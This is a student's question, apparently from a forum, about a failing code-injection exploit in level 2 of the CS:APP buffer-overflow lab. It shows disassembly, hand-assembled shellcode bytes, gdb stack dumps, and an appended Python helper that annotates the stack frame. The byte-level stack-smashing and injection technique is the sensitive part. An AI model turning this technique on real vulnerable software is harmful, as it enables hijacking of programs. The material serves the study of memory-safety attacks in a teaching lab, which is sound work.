I'm doing the CS:APP buflab level 2. In this assignment I'm asked to input an exploit string using getbuf().
Mine looks like:
08048fe0 <getbuf>:
8048fe0: 55 push %ebp
8048fe1: 89 e5 mov %esp,%ebp
8048fe3: 83 ec 18 sub $0x18,%esp
8048fe6: 8d 45 f4 lea -0xc(%ebp),%eax
8048fe9: 89 04 24 mov %eax,(%esp)
8048fec: e8 6f fe ff ff call 8048e60 <Gets>
8048ff1: b8 01 00 00 00 mov $0x1,%eax
8048ff6: c9 leave
8048ff7: c3 ret
8048ff8: 90 nop
8048ff9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
And bang() checks global_value:
void bang(int val)
{
    entry_check(2); /* Make sure entered this function properly */
    if (global_value == cookie) {
        printf("Bang!: You set global_value to 0x%x\n", global_value);
        validate(2);
    } else
        printf("Misfire: global_value = 0x%x\n", global_value);
    exit(0);
}
So I find the address:
0804a1dc <global_value>:
804a1dc: 00 00 00 00
And my exploit string looks like:
00000000 <.text>:
0: c7 05 dc a1 04 08 6c movl $0x6355476c,0x804a1dc
7: 47 55 63
a: 68 60 8d 04 08 push $0x8048d60
f: c3 ret
Then I search for the address of the input string (it should be on the stack):
Breakpoint 1, 0x08048fe6 in getbuf ()
(gdb) print /x ($ebp-0xc)
$1 = 0xffffb3ac
(gdb)
So my input string is c7 05 dc a1 04 08 6c 47 55 63 68 60 8d 04 08 c3 ac b3 ff ff
However, I still get a segmentation fault. The result shows that I entered the right address, and I successfully passed levels 0 and 1 using the same strategy; I don't understand where I went wrong...
Reading symbols from bufbomb...done.
(gdb) break *getbuf+17
Breakpoint 1 at 0x8048ff1
(gdb) run -t PB12000359 < fire_hex_raw
Starting program: /home/xgwang/Workspace/csapp_exp/Lab3 [buf Lab]/workspace/bufbomb -t PB12000359 < fire_hex_raw
Team: PB12000359
Cookie: 0x6355476c
Breakpoint 1, 0x08048ff1 in getbuf ()
(gdb) x/10x $esp
0xffffb3a0: 0xffffb3ac 0x555ac728 0x555e819b 0xa1dc05c7
0xffffb3b0: 0x476c0804 0x60686355 0xc308048d 0xffffb3ac
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xffffb3ac in ?? ()
(gdb)
This is the successful version of level 0 (where I was asked to simply overwrite the return address with another function's starting address). Notice that the addresses are in the same place, but level 2 just failed.
Reading symbols from bufbomb...done.
(gdb) break *getbuf+17
Breakpoint 1 at 0x8048ff1
(gdb) run -t PB12000359 < smoke_raw
Starting program: /home/xgwang/Workspace/csapp_exp/Lab3 [buf Lab]/workspace/bufbomb -t PB12000359 < smoke_raw
Team: PB12000359
Cookie: 0x6355476c
Breakpoint 1, 0x08048ff1 in getbuf ()
(gdb) x/10x $esp
0xffffb3a0: 0xffffb3ac 0x555ac728 0x555e819b 0x00000000
0xffffb3b0: 0x00000000 0x00000000 0x00000000 0x08048e20
0xffffb3c0: 0x00000000 0x08049ac7
(gdb) cont
Continuing.
Type string:Smoke!: You called smoke()
Thanks for any advice.
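One way to check the frame arithmetic in a session like the one above is to parse the gdb `x/Nx $esp` dump and label each word by its position in getbuf()'s frame. The script below is an added example, not part of the question or of the buflab code; it takes the two dump lines, the `sub $0x18,%esp` frame size and the `-0xc(%ebp)` buffer offset from the question, and everything else (function names, labels) is constructed here. It shows which input bytes occupy the 12-byte buffer, which land on the saved %ebp and the return address, and where `leave; ret` will transfer control.

```python
"""Annotate a gdb `x/Nx $esp` dump against the stack frame of getbuf().

Added example for the question above (not part of the post or of bufbomb).
Frame facts come from the question's disassembly:
  sub $0x18,%esp        -> %ebp = %esp + 0x18 at the breakpoint
  lea -0xc(%ebp),%eax   -> the buffer passed to Gets() starts at %ebp-0xc
"""
import re

# Dump from the question's level-2 gdb session at getbuf+17 (after Gets returned).
DUMP = """\
0xffffb3a0: 0xffffb3ac 0x555ac728 0x555e819b 0xa1dc05c7
0xffffb3b0: 0x476c0804 0x60686355 0xc308048d 0xffffb3ac
"""
ESP_AT_BREAK = 0xffffb3a0
EBP = ESP_AT_BREAK + 0x18      # 0xffffb3b8, from `sub $0x18,%esp`
BUF_OFFSET = -0xc              # from `lea -0xc(%ebp),%eax`


def parse_dump(text):
    """Return {address: 32-bit word} from `x/Nx` output (words as gdb prints them)."""
    words = {}
    for line in text.splitlines():
        m = re.match(r"\s*(0x[0-9a-fA-F]+):\s*(.*)", line)
        if not m:
            continue
        base = int(m.group(1), 16)
        for i, w in enumerate(m.group(2).split()):
            words[base + 4 * i] = int(w, 16)
    return words


def memory_bytes(words, start, length):
    """Raw little-endian bytes for `length` bytes starting at `start`."""
    out = bytearray()
    for addr in range(start, start + length, 4):
        out += words[addr].to_bytes(4, "little")
    return bytes(out[:length])


def classify(addr, ebp, buf_off):
    """Describe what the word at `addr` is in a frame whose %ebp is `ebp`."""
    buf_start = ebp + buf_off
    if buf_start <= addr < ebp:
        off = addr - buf_start
        return "buffer[%d..%d]" % (off, off + 3)
    if addr == ebp:
        return "saved %ebp"
    if addr == ebp + 4:
        return "return address"
    if addr < buf_start:
        return "outgoing argument / scratch below buffer"
    return "caller's frame"


def annotate(text, ebp=EBP, buf_off=BUF_OFFSET):
    """List of (address, word, label) for every word in the dump, low to high."""
    words = parse_dump(text)
    return [(a, words[a], classify(a, ebp, buf_off)) for a in sorted(words)]


def input_bytes(text, ebp=EBP, buf_off=BUF_OFFSET, length=20):
    """The bytes Gets() wrote, read back from the buffer start onward."""
    return memory_bytes(parse_dump(text), ebp + buf_off, length)


def ret_target(text, ebp=EBP):
    """Address that `leave; ret` will jump to: the word at saved %ebp + 4."""
    return parse_dump(text)[ebp + 4]


if __name__ == "__main__":
    for addr, word, label in annotate(DUMP):
        print("0x%08x: 0x%08x  %s" % (addr, word, label))
    print("input bytes:", input_bytes(DUMP).hex())
    print("ret goes to: 0x%08x" % ret_target(DUMP))
```

Running it against the question's dump labels 0xffffb3ac..0xffffb3b7 as the 12-byte buffer, 0xffffb3b8 as the saved %ebp and 0xffffb3bc as the return address, and reports that `ret` transfers control to 0xffffb3ac, which is the same address gdb printed in the SIGSEGV line.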